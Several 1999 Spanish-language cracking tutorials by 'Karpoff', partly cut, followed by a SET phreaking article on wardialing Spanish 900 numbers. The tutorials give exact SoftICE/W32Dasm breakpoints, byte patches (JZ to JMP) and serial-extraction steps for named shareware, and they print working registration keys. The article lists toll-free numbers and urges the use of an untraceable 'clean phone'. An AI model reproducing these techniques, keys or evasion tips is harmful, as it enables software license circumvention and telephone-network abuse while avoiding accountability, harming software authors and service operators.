:00439408 74F2 je 004393FC <= como si ah y al son iguales la flag z estará activa, y se producirá el salto al principio del 
bucle y se repitira el bucle para comprobar carácter x carácter, hasta ke el pass completo sea comprobado (demás esta decir ke si el 
pass ke colocamos nosotros tiene menor cantidad de caracteres ke el serial correcto el salto en 439408 no se producirá ya ke se lo 
considerara como un espacio vació y se lo comparará con el carácter del pass ke le corresponda comprobar) y nos iremos con una 
patada en el trasero a el mensaje de invalid password. 


Nota: estando en la dirección 439406 en donde se produce la comparación entre al y ah lo ke podemos ir haciendo es ver el 
contenido de al (carácter del pass correcto) con tan solo colocar en el softice el comando ? al y veremos su valor en hex, dec y ascci 
respectivamente, lo mismo hacemos con ah y vemos el carácter del pass trucho, para evitar tener ke cargar el pass de vuelta 
podríamos sobreescribir el valor del registro ah poniendo en el softice el comando r ah el_valor_en_hex_ke vimos_ke tenia_al con 
esto se producirá el salto ke hay en 439408 comenzando de vuelta el bucle y repitiéndose el procedimiento hasta finalizar la 
comprobación caracteres x carácter de nuestro pass con el pass correcto. 


Todo lo dicho resulta innecesario si se quiere evitar ir modificando el contenido del registro en cada comprobación que se realice, ya 
ke es intuitivo ke el pass correcto es el ke encontramos al colocar el comando d esi en el softice sobre la dirección 439400. 


Llegamos al fin de esté tuto Y 


Notas finales: 


Recuerda solo somos crackers, crackeamos x ke con ello nos divertimos, x ke con ello aprendemos. Mucho podrán decir ke esta mal 
lo ke hacemos o ke no es legal, pero con lo ke hacemos nosotros no jodemos ni molestamos a nadie. 


Pero a nosotros no importan las boludeces ke puedan decir los demas; lo ke verdaderamente importa es ke el cracking es lo ke mas 
no gusta, el cracking es nuestra forma de ver las cosas en el mundo, el cracking es parte de nosotros. 


Agradecimiento y Saludos: 


Al amigo karpoff, espero ke algún día vuelvas =) 


A toda la gente de CrackNFO 


Thanks amigo Gr0Ovy por publicar mis tuto y permitirme ser miembro de la page 


Karpoff Spanish Tutor 


Programa: Win-eXpose Registry V1.0 


PROTECCION: Name / Serial 


Descripcion: Spya del Registro de Windows 


Dificultad: 


Facilon 


DOWNLOAD: 


http: //www.shetef.com/wxr95-10.zip 


Herramientas: Softlce v3x +, W32Dasm , Editor Hexadecimal 


karpoff FECHA: 21/08/99 


INTRODUCCION 


Hit Tutoríal de Crackeo Para Newbies desde Cero 21/08/99 


Por Karpoff Hi PROYECTO 6 it 


- Continuando Con el Softlce. 


- Win-eXpose Registry V1.0 


Hola nuevamente a todos/as, que tal el proyecto 5 ?????, seguro que la mayoría conseguisteis el n/s correcto. 
Debido a que he recibido algunos Emails pidiéndome que continuase con proyectos basados en W32Dasm, he 
escogido este programa. 


Es una utilidad muy buena para rastrear los procesos de cualquier aplicación que se ejecute en nuestra 
maquina, esta utilidad muestra los cambios que puede hacer un proceso tal, en el registro. 


La podedeis coger de: 


http: //www.shetef.com/wxr95-10.zip 


AL ATAKE 


Lo estudiaremos con el Softlce y con W32Dasm, así podéis escoger la herramienta que mas os guste. De todas formas sigo 
pensando que si habéis seguido los manuales estáis mas que preparados para utilizar el Softlce, yo os recomiendo este, 
las protecciones cada vez son mas enrevesadas, y con un listado muerto es imposible de seguir. 


El programa de hoy es bastante antiguo tiene una protección ridícula, para registrar el programa tenemos que rellenar 
un formulario que Casi parece nuestro D.N.I. nos pide nombre, ler apellido, 2do apellido, nombre de la compañía ( 
Leticia J ) un numero de serie y un passwod. La clave valida se genera según el numero de serie que metamos, una vez 
generado el numero valido, no lo guarda en el registro ni lo encripta en dios sabe donde, sino que lo guarda su 
archivo .ini. 


Herramientas: las de siempre. Softlce o W32Dasm y un HEX editor. 


Ataques, Localizar la rutina que se encarga de verificar si el n/s que hemos metido es correcto o no, y manipularla 
para nuestro beneficio, o bien eliminarla si es posible, o podemos localizar el punto donde se genera el n/s valido y 
capturarlo, En esta ocasión haremos las dos cosas. 


El programa nos da una evaluación de 30 días, pasado este tiempo, no podemos seguir utilizándolo, ya que detiene el 
proceso que este realizando y nos muestra la pantalla de registro cada x tiempo 


PARTE 1 ( CON EL SOFTICE) 


Empezamos con el SoftlIce. Arrancamos el ordenata y cargamos el Softlce, abrimos Wxr95.exe con el soft. Pulsamos el 
botón de los engranajes para empezar a tracear el programa. Saltamos al softlce y pulsamos F5 para que continúe su 
ejecución, aparecemos otra vez en Windows y con el programa abierto, metamos los datos del registro. 


Your asked to enter: 


Your First,LastName:a 


Company Name, :a 


Address Line 1l: a 


Address Line 2: OWL(Bhuo) 


Serial Number: 123456789 


Password: 123456789 


Podéis rellenar con los datos que queráis, según que datos metáis generara un numero u otro. Ahora debemos poner un BP 
o punto de ruptura, para capturar la rutina que comprueba nuestro numero y genera el numero valido, yo he probado con 
Messageboxa , pero podéis intentarlo con otros BPs, ( es mas, os obligo a que practiquéis con otros BreakPoints, para 
ver las diferencias entre que procesos capturan unos u otros, aprenderéis mucho probando.) Pulsamos [Ctrl+D] para 
saltar al Softice y ponemos. 


BPX messageboxa 


Volvemos a pulsar [Ctrl1+D] Para salir del Softice y pulsamos aceptar en los datos del registro, en este momento el 
breackPoint que pusimos hace efecto y saltamos al Soft. Justo en: 


User32! Messageboxa 


015F:BFF5412E 55 PUSH EBP 


Aparecemos directamente dentro de user32.dll1 en una llamada externa a messageboxa, a nosotros no nos interesa para 
nada navegar dentro de esta dll lo que nos interesa averiguar es quien llamo a messageboxa. 


Para ver quien hizo la llamada a messageboxa pulsamos F11 o F12 Y ooh L salimos a Windows con el mensaje de que hemos 
fallado en el registro, que nos sugiere esto, (antes de seguir leyendo pensar porque en vez de llavarnos a el 
principio de la llamada nos saca a windows con el mensaje de error. ) pues que la llamada que se hizo a messageboxa 
debe se ser muy sencilla, y pequeña, ( esto siempre son mis deducciones que podrían no ser del todo así, pero como ya 
he comentado mis conocimientos son bastante pobres J ) 


Como siempre mi ataque es pensar que tiene que haber una parte de la rutina donde comprueba si es valido el numero 
metido o si es falso, esta comprobación estaría seguida de un salto que dependiendo del valor que reciba saltara a el 
mensaje de error o continuara su ejecución normal aceptando el numero de registro, o viceversa .(aclaro que este tipo 
de comprobación que comento es la mas sencilla que conozco, podría no tener nada que ver con este estilo, pero dado 
que es un programa antiguo y que utiliza un archivo .ini para guardar el registro creo que es la que utiliza.) 


Continuamos nos habíamos quedado en el mensaje de error, como todavía tenemos el BreakPoint messageboxa activado 
pulsamos [OK] en el mensaje de error y nos lleva a: 


:004025A3 CALL [USER32 !MessageBoxA] 


:004025A9 MOV BYTE PTR [EBP-04],00 --á Aquí aparecemos. 


:004025AD CALL 00402750 


:004025B2 MOVE DWORD PTR [EBP-04],FFFFFFFF 


:004025B9 CALL 00402762 


:004025BE MOV EAX, [EBP-0C] 
:004025C1 POP EDI 

:004025C2 MOV FS: [00000000],EAX 
:004025C8 POP ESI 

:004025C9 POP EBX 

:004025CA MOV ESP, EBP 

:004025CC POP EBP 


:004025CD RET 


Creo que estamos al final de la rutina de comprobacion, entonces remontemos la rutina para localizar una comprobación 
tipo TEST XXX,XXX o CMP XXX, XXXXXXX seguida de un salto que tenga las características si el numero es valido salta si 
no es valido continua, ( O al rreves), Miremos que encontramos por hay arriba, subimos mas mas un poquito mas, y 
encontramos el primer je que según el valor que reciba de Test XXX,XXX salta o sigue su ejecución. 


:004024F7 TEST EAX,EAX aá si el numero es correcto le dice a el salto que salte a la dirección 004025ce, si es 
falso continua ejecutándose en la siguiente línea, y empieza a generar los mensajes de error. 


:004024F9 JZ 004025CE a Según el valor que le asigne TEST salta o no. 
:004024FF PUSH 0040A1A4 
:00402504 MOV ECX, 0040A90 


:00402509 PUSH 0040A158 


:0040250E PUSH 0040A140 


:00402513 CALL 00406E40 


Y vosotros os preguntáis, y como save este tío que para que acepte el numero de registro lo valido es que salte y no 
al reves. Contestación pues podéis probar a cambiar el salto por un salto incondicional (jmp) que salta lleve el valor 
que lleve. O podéis desensamblar el programa y observar esta parte del código, veréis que si no salta y sigue su 
ejecución normal, se va ha encontrar con todos los avisos de error, pero si salta evita todos los aviso.( tenéis que 
verificar lo que os he dicho es obligatorio J ) 


Continuamos, estabamos dentro del soft y habíamos localizado el posible salto. 


Bueno hemos localizado el salto pero esta parte del código ya se ha ejecutado así que tenemos que entrar en el soft 
antes de que se ejecute este salto para así poder manipularlo, como lo hacemos muy fácil tenemos que ponerle un 
BreakPoint para entrar en el soft justo antes de que se ejecute, y tenemos que borrar el BreakPoint messageboxa para 
que no se active en plena ejecución, porque ya hemos localizado lo que queríamos, pues no nos sirve ya para nada. Para 


desactivar el BreackPoint 


BC 00 a Borra el primer Breakpoint que hallamos puesto en este caso messageboxa, para ver que numero de BP tiene 
asignado cada uno en caso de que hubieseis utilizado otros. 


BL á nos lista los breakPoint tanto activos como desactivados, ej, 


BL [INTRO] 


00 messageboxa 


01 messagebox 


02 getwindowtexta 


Una vez borrados los BreakPoints, le ponemos otro a :004024F9 JZ 004025CE , para poner un BP a una dirección de 
memoria podemos hacer doble clip encima de la dirección que nos interese o como siempre con el comando BPX 


BPX 004024F9 


Si ya hemos hecho todo esto pulsamos F5 o [Ctrl1+D] para salir del Soft, estamos nuevamente en el formulario de 
registro, ahora solo tenemos que pulsar OK y aparecemos justo en el salto :004024F9 JZ 004025CE ,Bueno tenemos 
que convertirlo en un salto incondicional (jmp) que salte por narices, lo primero desactivamos o borramos el BP que le 
hemos puesto, ya no nos sirve para nada, ahh muy importante, y si este no fuese el salto que buscábamos??? ,si este es 
el salto correcto todavía no se tiene que haber generado el mensaje de error como saberlo, recordar el tutorial 
anterior.... solo tenemos que pulsar la tecla F4 para ver como van las cosas fuera del soft si pulsamos F4 y esta el 
aviso de numero incorrecto mal asunto, si no esta vamos bien, pulsamos F4 y vemos que no se ha generado bien J , 
volvemos al soft pulsando otra vez F4. Tenemos que convertir 


004024f9 0F84CF000000 JZ 004025CE 


CAMBIARLO POR 004024F9 ¿2772272272777 JMP 004025CE á salto incondicional 


Las interrogaciones significan que tendremos que averiguar que Bytes son los que harán que jz se convierta en jmp para 
que el programa funcione correctamente, debemos tener en cuenta que si hay que cambiar Bytes nunca podemos meter mas o 
menos Bytes de los originales. Hasta ahora hemos cambiado: 


JE POR JNE = 74 POR 75 


JNE POR JMP = 75 POR EB 


JE POR JNE = 0F84CF000000 POR 0F85CF000000 


PERO COMO CAMBIAMOS UN 0F84CF000000 JE POR UN JMP 


La manera que yo utilizo es, cuando lo cambiemos en el soft fijaros en como cambian esos Bytes y apuntarlo, por que si 
luego queremos generar el Crack necesitaremos un HEX edit y cambiar los Bytes por los que hemos apuntado. (con el 
W32dasm también podemos averiguar que Bytes son la sustitución correcta, luego lo explico.) 


Estamos dentro del Soft justo en el salto que nos interesa, hemos desactivado el BP del salto haciendo doble clip 
sobre el ( se quitara el azul cyan ) o con el comando 


BC 004024F9 y ahora a ensamblar la nueva instrucción, con el comando A del SOFT 


004024f9 0F84CF000000 JZ 004025CE 


004024FF 684A1400 PUSH 0040A1A4 


A 004024F9 [INTRO] 


Nos mostrara.. 


015F:004024F9 á AQUÍ TENEMOS QUE ESCRIBIR EL CAMBIO QUE TENEMOS QUE HACER OSEA. 


015F:004024F9 JMP 004025CE [INTRO] EN ROJO LO QUE HEMOS ESCRITO PAR ENSAMBLARLO. 


015F:004024FF [INTRO]NOS MUESTRA LA SIGUIENTE DIRECCION DE MEMORIA POR SI QUEREMOS SEGUIR ENSAMBLANDO NUEVAS 
INSTRUCCIONES, COMO NO QUEREMOS PULSAMOS [INTRO] Y LA NUEVA INSTRUCCIÓN QUEDA ENSAMBLADA. 


Ahora fijaros en el Soft como ha cambiado la línea del salto, tiene que mostrar esto. 


004024f9 E9DO0000000 JMP 004025CE a Ahora si salta a 004025CE 


apuntar en un papel lo que esta en rojo para luego hacer el crack. 


Bueno ahora pulsamos F5 para que se termine de ejecutar el programa y OLEEE J J , no hay aviso de error nos ha 
aceptado el numero pero que numero es?. 


Vamos a C:1Windows y editamos el archivo Wxr95.ini y 


Key=EXPREF062F11 


Este código solo es valido para los datos que hemos utilizado 


Ya tenemos registrado el programa. si miráis en help about veréis los datos que halláis metido J 


PARTE 2 W32Dasm 


Quiero deciros que en esta segunda parte no me voy a extender en explicaciones, ya que es el mismo programa solo que 
con distinta herramienta las explicaciones de funcionamiento, protecciones y ataques son las mismas que con el Soft. 


Lo primero hacer una copia del ejecutable Wxr95.exe bien con otro nombre o copiando todo el programa a otra carpeta. 
Abrir el original con el W32Dasm y la copia con un Editor HEX. 


Empezamos pulsamos el botón del W32dasm que nos muestra todas las cadenas de texto. Localizamos la que nos escupe 
cuando fallamos en el registro 


Wrong password please reenter 


Hacemos doble clip sobre la frase y nos lleva a 


Possible StringData Ref from Data Obj á " Wrong password please re-enter " 


a " Informarion." 


:0040259%c 6860*14000 PUSH 0040A160 


bueno pues como siempre tenemos que encontrar un salto con la siguientes características, que según el valor que le 
asignen pueda saltarse este aviso, o que su ejecución normal le permita llegar asta este aviso, dependiendo de si 
acepta el registro o no, pues ala manos a la obra. 


Os habéis fijado, que según íbamos hacia arriba nos encontrábamos con un montón de avisos todos ellos relacionados con 
formulario de registro, y al final de todos ellos el salto con las características que buscamos. 


:004024F7 85c0 TEST EAX,EAX á si el numero es correcto le dice a el salto que salte a la dirección 004025ce, si 
es falso continua ejecutándose en la siguiente línea, y empieza a generar los mensajes de error. 


:004024F9 0F84CF000000 Je 004025CE a Según el valor que le asigne TEST salta o no. 


Como veis si salta evitaría el aviso de error, y si no salta continuaría normalmente hasta el aviso maligno. Que 
tenemos que hacer para que salte convertirlo en un salto incondicional que salte por narices. 


Como he comentado en la parte 1 no estamos acostumbrados a realizar cambios se saltos, con tantos Bytes, así que os 
explicare como saber que bytes son los validos para poder patchear el je por jmp 


En el menú de archivos pulsar en debug y seguidamente en load proccess, vamos a aplicar el cambio al estilo del Soft, 
con el programa en marcha. Para el que no lo sepa el W32dasm cuenta con su propio debug es pobre comparado con el soft 
aunque muy cojonudo comparado con otros que hay por hay , dedicare un turorial a explicar como utilizar este debug. 


Bueno si habéis hecho lo que os dije, ahora tendréis una ventanita con una línea de comandos, si poner nada pulsar 
load, y el debug empieza a ejecutar el Wxr95.exe 


Ahora pulsar en la opción GOTO ADDRESS ( IR A UNA DIRECCION DE MEMORIA ), aparecerá una ventana donde debéis de meter 
la dirección de memoria donde se encuentra el salto que queremos patchear escribimos 004024f9 , y pulsamos OK 


E inmediatamente aparece en la ventana de procesos nuestro salto. 


Ahora para modificarlo pulsaremos la casilla Patch Code y se habré otra ventana con nuestro salto y una línea de 
comandos para aplicar los cambios que queremos realizar, osease que escribimos: 


JMP 004025CE Y PULSAMOS [INTRO] 


Ahora fijaros en code Patch listing hay tenemos el patcher que acabamos de generar, tiene que mostraros esto 


004024f9 E9DO0000000 JMP 004025CE el patcher todavía no esta aplicado, pero ya sabemos cuales son los Bytes que hay 
que utilizar para cambiar el je del código original por el jmp del código manipulado, estos bytes son los que están en 
rojo, si quereis generar luego el cack recomiendo que lo apunteis, para aplicarlos en el editor HEX. 


Bueno apliquemos el patcher a el programa, todavía tenemos la ventana donde nos muestra el patcher que hemos generado, 
para aplicarlo solo tenemos que pulsar la opción Apply Patch, una vez que hemos pulsado esa opción nos pide 
confirmación, aceptamos claro, y ya esta cerramos esa ventana pulsando Close, ahora ya esta el patch aplicado, se 
supone que si pulsamos la opción run o la tecla F9 el programa aceptara cualquier registro que metamos. Y como era de 
esperar así ha sido. 


Ahora si miráis en el archivo Wxr95.ini que se encuentra en C:lwindows veréis en 


KEY:vuestra Clave de registro 


No es necesario parchear con el Editor Hex los cambios, ya que nos ha generado una clave valida en el archivo 
Wxr95.ini, bueno en realidad la clave si la metes desde el formulario de registro no es valida, lo que es valido es 
todo el archivo Wxr95.ini, que en este caso seria un Crack valido. 


De todos modos yo os recomiendo que generéis el crack parcheando la copia del ejecutable con el editor Hex, y hacer el 
ejecutable con cualquier Generador de cracks, lo guardais hasta que tengáis una gran colección, luego le dejáis 
flipado/a a la novia/o J 


No explicare como aplicar los cambios con el Hex, por que ya tenéis nivel para eso y mucho mas. hasta el próximo 
tutorial, 


Un saludo a Todos/as [y como no a el Bhuo]. 


( Karpoff.) 


Como siempre espero que lo halláis cogido, yo intento explicar lo mejor que puedo, pero no soy ningún experto. 


Si teneis algun programa que os esta dando gerra porque no podeis con el, Podemos analizarlo aqui. Solo teneis que 
mandarme un email. 


Cualquier Duda, Sugerencia, Critica etc. A 


Email Kf karpofffthotmail.com URL: http://welcome.to/karpoff 


Un Saludo a TODOS/AS. (Karpoff) 


Este material es solo para uso educativo, por ahora los cracks son ilegales. 


Karpoff Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, sobre Ingenieria Inversa y Programacion. 


Email "Colabora con tus Proyectos" 


HH Tutoríal de Crackeo Para Newbies desde Cero 22/09/99 


Por Karpoff it GRUPO KF_CRACK KARPOFF-NEW 98/99 HH 


PROYECTO 12 tit 


INTRODUCCION. 


Hello Nuevamente ¡! Tan solo han pasado 2 dias desde el manual n*11, pero este va ha ser un manual cortito, quiero que 
conozcáis una herramienta que muchos no conoceréis, se trata de APIS32 V 2.4. Esta herramienta nos puede mostrar las 
apis que maneja un programa en cada momento, ejemplo: estamos con ele Softlce intentando sacar el S/N valido de un 
programa pero no encontramos el breakPoint apropiado, que nos capture el proceso de creación y comparación del S/N, 
pues el APIS32 nos puede ayudar, os diré como a la vez que sacamos un S/N valido de la ultima versión de WinXfiles V2.4 
(| es tan nueva que solo tiene 4 días ) este programa es para encriptar todo tipo de archivos, imágenes etc. 


Podéis encontrar APIS32 V 2.4 en mi Web en la sección herramientas, Editores HEX £ Utiles http://welcome.to/karpoff 


Parte 1 


Este programa WinXfiles hace 3 versiones era tan fácil de crackear como desemsamblarlo y parchear un salto, (solo 
faltaba que en el readme del programa te dijesen donde encontrar el je a partchear, creerme que era facilísimo) hoy 
cuenta con algunas protecciones, el código fuente a cambiado, si modificas el programa este se cierra automáticamente, 
y algunas cosillas mas haciendo muy difícil petarlo con listado muerto. 


Lo podéis coger de: 


http: //www.pepsoft.com/wxf32 42.zip 


ftp://ftp.cix.co.uk/mirrors/tucows.com/files3/wxf32 42.zip 


Herramientas: Softlce y APIS32 V 2.4 , Cuento con que tenéis bien configurado el Softlce ya que en este manual no voy a 
dar ninguna explicación sobre el tema. 


Comportamiento del programa Tenemos 30 días de evaluación pasado ese tiempo deja de funcionar, desconozco si tiene 
algún tipo de limitación, no muestra ningún nag de arranque, tenemos la opción de registrar el programa, si metemos los 
datos al azar nos saldrá un nag diciendo Sorry this number is invalid o algo así, este nag no es del tipo de 
messageboxa es un nag que mas bien parece un icono grande, no emite ningún beep con lo cual nos dificulta mas el 
capturar el proceso mediante el nag. 


Ataque Localizar un S/N valido dependiendo del nombre que metamos, localizaremos el numero rastreando los registros ( 
eax, eip, ebx etc), ya que el S/N se genera según nuestro nombre y en un momento dado se compara con el nuestro, pero 
mientras ocurren todos etos procesos el S/N valido esta en alguna parte de la memoria puesto que ya se ha generado o se 
esta generando, rastrearemos los registros sin liarnos demasido si no encontramos lo que queremos enseguida, pasamos a 
tracear el programa y a ver todo el proceso. Como ya os dije en manuales anteriores no tenemos por que seguir unas 
pautas de crackeo, sino que todo lo que se nos pueda ocurrir es perfecto. 


PARTE 2 


A trabajar. Tenemos iniciado Windows con Softlce y APIS32 V 2.4 ya en funcionamiento, el aspecto de APIS32 V 2.4 es 
este. 


¿g APIS32 y. 2.4 - Registered to KF_CRACK KARPOFES | 15] xj 


Startllp 
[X On Top 


Examinina Applicaticr 


[C:5Program Alles liresFiles files exe e 
Command Line 4rgumentz: | 


Follow 4PI] functions are <pied 


FT Pauze 


ADVAPI32: BegUpenKeyá [ HANDLE, LESTA, LPDATA ] 

ADWAPI32: RegOpenKeyExá [ HANDLE, LPSTA, DWORD, DWORD, LPDATA ] 

ADVAPI32: RegOpenkeyExw! [ HANDLE, LPWSTA, DWORD, DWORD, LPDATA, ] 

ADVAPI32: RegOpenkKeya! [ HANDLE, LPWSTA, LPDATA ] 

KERNEL32: _hread ( HANDLE, LPDATA, DWORD ] 

KERNEL32:hwrite [ HANDLE, LESTA, DWORD ] 

KERNEL32 : close [ HANDLE ] 

KERNEL32 :lcreat [LPSTA, DWORD ] 

KERNEL32 > llseek [ HANDLE, DWORD, DWORD ] 

KERNEL32: open [LPSTR, DWORD ] 

KERNEL32 : lead [ HANDLE, LPDATA, DWORD ] Add 
KERNEL32:lrite [ HANDLE, LESTA, DWORD ] 

KERNEL32 : CreateFileó, [LPSTR, DWORD, DWORD, LPDATA, DWORD, DWORD, HANE D | 
KERNEL32 : CreateFileMappingá [ HANDLE, LPDATA, DWORD, DIMORD, DWORD, LPST => 
A A OS a an] 


el 
RERNEL32: CreateMallslotá | LPSTAR, DWORD, DAODRO,LPDATA ] eL 


Aun Imports | Exit | ¿bout | 
Examining application --- Escoger el programa que vamos a analizar 
Command line arguments --- por si queremos ejecutar el programa con alguna opción 
Follow API functions are spied --- Esta es la lista de funciones Api que nos detectaría en el programa a analizar, 


podemos añadir mas. 


Find ---- Buscar una Función en la lista 


Add --- Añadir mas Funciones tenemos una larga lista para añadir (dependiendo de las librerías .dll que utilice el 
programa pues añadimos)) 


Run ---- Ejecutar el programa que tenemos seleccionado, es muy importante para que nos sirva de algo el apis32 ir 
viendo en que momento de van ejecutando las funciones, que luego serán nuestros breakPoints en el soft. 


En nuestro Caso cargamos el archivo Wxfile.exe como esta en la foto y pulsamos Run se empieza a ejecutar el programa y 
vemos como van apareciendo las funciones que utiliza, pero a nosotros nos interesa las funciones que utiliza cuando nos 
muestra la ventana de error tras intentar registrarnos, Ósea que vamos a WinX Files y pulsamos en el dibujo del cerdo, 
si! donde pone que tenemos 30 dias, nos sale la ventana de registro y rellenamos con lo que queramos, en mi caso 
pondre. 


User Name: karpoff 


Key: 14141414 


Fijaros bien en el apis32 en las funciones que se han ejecutado 
nos posicionamos en la ultima función (con el ratón) y nos 
preparamos para pulsar OK en la ventana de registro a la vez que 
vemos que función escupe cuando muestre la ventana de que hemos 
fallado en el registro, y la función ha sido CreateWindowExa pues 
este será nuestro BreakPoint. 

Cerramos todo y cargamos el archivo Wxfile.exe en el Softlce 
Pulsamos el botón de los engranajes nos sale la ventanita pulsamos 
aceptar y estamos en el softice, ahora tenemos que salir para 
rellenar los datos del registro así que pulsamos F5 o [CTRL+D], 
devuelta a Windows y con WinXfiles ejecutado , nada pues a 
rellenar con los datos anteriores y atención ahora tenemos que 
ponemos nuestro BreakPoint, pulsamos [CTRL+D] y de nuevo en el 
softice a poner el BP 

BPX createwindowexa 

Tenemos que volver al windows para pulsar OK en los datos del 
registro, ósea que de nuevo F5 o [CTRL+D], y cuando salgamos a 
Windows pulsamos OK en los datos y haber si hace efecto la función 
createwindowexa EXPLACHSSSS estamos en el Softlce concretamente 
en. 


USER32 ! CREATEWINDOWEXA 
015F:BFF55C65 B530. -=-===-=-- AQUÍ 


Como veis si miráis la parte inferior derecha del softice veréis 
que nos encontramos dentro de la librería de Windows USER32.DLL a 
la cual Wxfile.exe a hecho una llamada a la función 
createwindowexa tenemos que saber que parte del código de 
nuestra víctima llamo a esta función pulsamos F12 y EXPLACHSSSS 
aparecemos en la rutina padre. 


015F:00416B99 E866EAFEFF Call USER32!CREATEWINDOWEXA -— 
LLAMADA A LA FUNCION 
015F:00416B9E 8986C0000000 mov dword ptr [esi+000000C0], eax 


— ESTAMOS Aquí 


hemos dicho que intentaremos localizar el S/N valido rastreando 
los registros no¿? Bueno pues pulsar la tecla F2 y aparecen en la 
parte superior del Softlce los registros con sus valores, ahora 
posamos el ratón sobre cualquiera de ellos por ejemplo EAX y 
pulsamos el botón derecho, se despliega un menú de opciones 
escogemos Display y rastreamos la ventana de datos ( la ventanita 


donde están los datos en Caracteres) con las flechitas de 
movimiento de la ventana miramos hacia arriba y hacia abajo 
fijándonos en todo, atención pero rastreamos cada registro un 
poquitin para arriba y lo mismo hacia abajo, no os tiréis la de 
dios de tiempo, si no veis nada interesante al siguiente registro 
y hacéis lo mismo. 


Prestar especial atención si veis números o un cacho del nombre 
que metisteis entonces lo miráis mas detenidamente. Bueno y cuando 
llegueis a ESI y miréis un pelin hacia arriba veréis 3 códigos uno 
el [nuestro] otro compuesto por [letras, números y un par de 
caracteres] y el ultimo todo [letras mayúsculas] apuntarlos y a 
probar. 

En efecto la clave es 


NAME: karpoff 
KEY: CERKTEFVUNOJPHN 


Era lógico pensar que el código valido eran las 15 letras mayúsculas, ya que 
el otro código contenía un par de caracteres (! Que no suelen ser corrientes. 
Habéis visto lo fácil que puede ser encontrar un S/N sin seguir todos los 
procesos, cuando tengáis un programa para crackear hecharle imaginación 
crackear tiene que ser algo divertido. 

Llegados al n*12 de esta serie de manuales, me gustaría que me mandaseis 
sugerencias sobre como queréis que siga avanzando esto, si queréis proyectos 
con el Softlce o empezar con el SmartCheck (como el Softlce pero para visual 
basic) o manuales sobre como funcionan algunas herramientas de cracking. Lo 


dejo en vuestras manos. 
Un saludo para todos en especial los que me habeis participado activamente con 
sugerencias preguntas etc, 


Pues esto es todo. Que os a parecido.. interesante no¿? Como siempre mi mayor deseo es que entendáis esto como yo 
intento explicarlo. Es difícil escribir manuales creerme, pero mientras una sola persona los lea seguiré J 


Con cualquier duda mandarme un email, contesto a todos los email. 
Un saludo para todos/as (karpoff) 


Kf_karpofffthotmail.com 


http://personal2.redestb.es/karpoff 


http: //welcome.to/karpoff 


El uso de este material es solo para uso educativo, por ahora los cracks son 


ilegales cada cual es responsable del uso que le de a este tutorial, el autor 
no se hace responsable de nada. 


Karpoff Spanis 
Tutorial Descargado de Luto! 


AR / 


Utilidades del WarDialing... 


...Phreaking Practico 


(Hoy Los 900, el prefijo magico) 


ION 


Numeros 900 - GreeN LegenD / SET Staff (c) 1998 


http://set.net.eu.org - glegendí(Wset.net.eu.org 


1) Intro y Medidas Cautelares.. 

2) Llamada a Operadoras de (casi) cualquier Pais atraves de 900 
3) Mitos sobre los Numeros 900 

4) Numeros 900 


1) Intro y Medidas Cautelares 


Se ha hablado de los numeros 900 con antelacion en SET, pero 
no voy a lo teorico, sino a lo practico. WARDIALING 


Esto es ante todo una leccion practica, para ver la utilidad del 
Wardialing y a la vez aprender de los 900. No es una tonteria como 
algunos pensaran..encontrareis servicios de mensajeria *gratuitos* 
modems que redireccionanaran vuestros faxes y algunas cosas mas.. 
pero eso os dejo que lo descubrais vosotros.. Pero cuando veais que 
un numero nos os vale de nada no siguais llamando. Es un consejo de 
la Direccion General de Hacking Espa-ola.. ;) (DGHE!) 


Bueno todos sabeis ya como funcionan los numeros 900 no? 


Son cuentas especiales con Telefonica que basicamente se basan en 

lo siguiente : El importe de la llamada es cobrado al que la recibe, 

no al que la realiza. Y como en botica hay de todo... vamos a descubrirlo 
un poco, pero solo un poco para que tu mismo sigas solo. Ahi esta lo 
practico del tema que hoy tratamos, que tu lo veas por t1 mismo. 


*Aviso* 


Antes de nada un Aviso, este va para los "avispaos" : 

No abuseis dado que algunos de los numeros tienen Caller 1d y te bloquean 
despues de hacer varias llamadas, otros no funcionan desde todas las provincias 
o desde moviles. Mas cosas a ciertos numero cuando descubrais lo que son 
dejadlos en paz. Ejemplo claro este : 


900100202 Comisaria Nacional de Policia (Caller Id) 


Un "amable" policia responde : Comisaria Nacional.. 
¿Que denuncia quiere hacer?... 


(Pero si quiereis que los maderos hagan una visita a domicilio) 
(a vuestra casa y gratis, pues nada a delante.. ) 


Y por que se me preguntara el recien llegado. Numeros de bomberos, policia, 
*alertas de cualquier tipo y ayuda* si juegas con ellos te puede caer una 
buena. Avisados estais y que avisa no es traidor.. ademas de estar protegidos 
por la ley (les proteje una parte de legislacion especial) Ademas te crees que 
un juez en caso de que tenga que juzgar : 


¿Que es mas importante hackear un 900 de un Hospital -linea datos- (los hay..)? 


o por el contrario 
¿Un numero 900 de sobaos Martinez ?? 


Piensa y reflexiona que no es tan dificil y no metas la gamba.. El 
primero te caen unas cuantas cositas mas... 


Mas cosas sobre los 900 todos los numeros que aqui se encuentran se han 
comprobado con un movil (Limpio), eso quiere decir que cogeran una llamada desde 
cualquier sitio, hay numeros listados que estan activos-contratados 

pero no lo coge nadie, otros que funcionan pero desde donde he hecho 

las pruebas (movil) no cogen llamadas (eso no quiere decir que no acepten 

llamadas desde cualquier comunidad, simplemente que el cargo maximo por 

minuto, un movil, no se acepta).Probablemente solo lo hagan de Madrid o 

Barna o otras grandes ciudades (o solo ciudades donde al contratante le 

de la gana..). 


IMPORTANTE-IMPORTANTE-IMPORTANTE-IMPORTANTE-IMPORTANTE- 
IMPORTANTE- 


USA UN TELEFONO LIMPIO, no uses tu casa... No te voy a explicar lo 
que es un Telefono limpio, lee SET... 


IMPORTANTE-IMPORTANTE-IMPORTANTE-IMPORTANTE-IMPORTANTE- 
IMPORTANTE- 


Para poder hablar con una operadora de la compa-z1a de otros paises 

no teneis mas que marcar 900990XXX siendo XXX el codigo del pais 
Internacional, Alemania (+49) seria 900990049 y Hong Kong (+852) 
900990852. Esta operadora te dejara hacer llamadas a cobro revertido, 
usar un calling card de esa compa-1a y algunas cosas mas raritas.. 

Todo depende de la compa-1a de Telefonos respectiva..estad advertidos 
que algunas no lo tienen. Despues de informarme bien, este servicio es 
una "especie" de intercambio que realiza Telefonica con otras compa-1a 
a cambio de que expandir su servicio Espa-a Directo.. y tened claro que 


estas operadoras de un numero 900 son muy distintas de las que se pueden 
contactar de otras maneras, 07+XX, 050-00+XX o bien con un numero directo 
desde Espa-a. 


3) Mitos sobre los Numeros 900 


No existe este servicio de numero gratuitos con un comienzo comun en todos 
los paises. Alemania no lo tiene, ni Turkia, China tampoco. Lo cual no 
impide que estos paises no tengan numeros gratuitos..que de hecho los tienen. 


